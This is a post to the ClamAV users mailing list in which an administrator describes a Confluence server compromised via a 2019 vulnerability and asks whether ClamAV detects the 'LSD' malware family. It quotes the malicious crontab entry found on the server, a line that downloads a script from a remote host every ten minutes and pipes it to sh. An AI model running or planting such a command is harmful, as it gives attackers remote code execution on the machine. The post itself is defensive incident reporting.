Dear Friends, We recently faced an Atlassian Confluence issue lately. Atlassian issued a security advisory the 29/03/2019 <https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html> . Following this thread <https://community.atlassian.com/t5/Confluence-discussions/khugepageds-eating-all-of-the-CPU/td-p/1055337>, We understood what happened on our server. Confluence is running in its own user space and have seen its crontab hacked.
On our Debian Stretch the 'crontab -u confluence -e' shows a non legit instruction : */10 * * * * (curl -fsSL https://dd.heheda.tk/i.jpg||wget -q -O- https://dd.heheda.tk/i.jpg)|sh Obviously the security flaw in Confluence open the gate to this behaviour. As we are running Confluence in its own user space, the i.jpg who contains the shell script file didn't harm our server. No malwares have been deployed however the server was shutting down immediately after starting. We cleaned up the crontab and upgraded Confluence to avoid any further infection. However we need to check our installation and I'm wondering if ClamAV knows already this malware family <https://git.laucyun.com/security/lsd_malware_clean_tool/blob/master/README.md>. I already open a report to ClamAV. is there any user who faced this issue and is ClamAV ready to detect and cleanup our Linux boxes ? Any pointers about any informations about this LSD Malware family will be greatly appreciated as I try to evaluate the risks for our infrastructure (I checked various DB with no success and googled too). Warmly. Light Pudhuveedu / Xavier PGP Fingerprint: CAE5 CE4A EFE9 134F D991 5465 081C B6FB 2EAC 6CC9 <http://keyserver.ubuntu.com/pks/lookup?op=get&search=0x081CB6FB2EAC6CC9>
_______________________________________________ clamav-users mailing list clamav-users@lists.clamav.net https://lists.clamav.net/mailman/listinfo/clamav-users Help us build a comprehensive ClamAV guide: https://github.com/vrtadmin/clamav-faq http://www.clamav.net/contact.html#ml
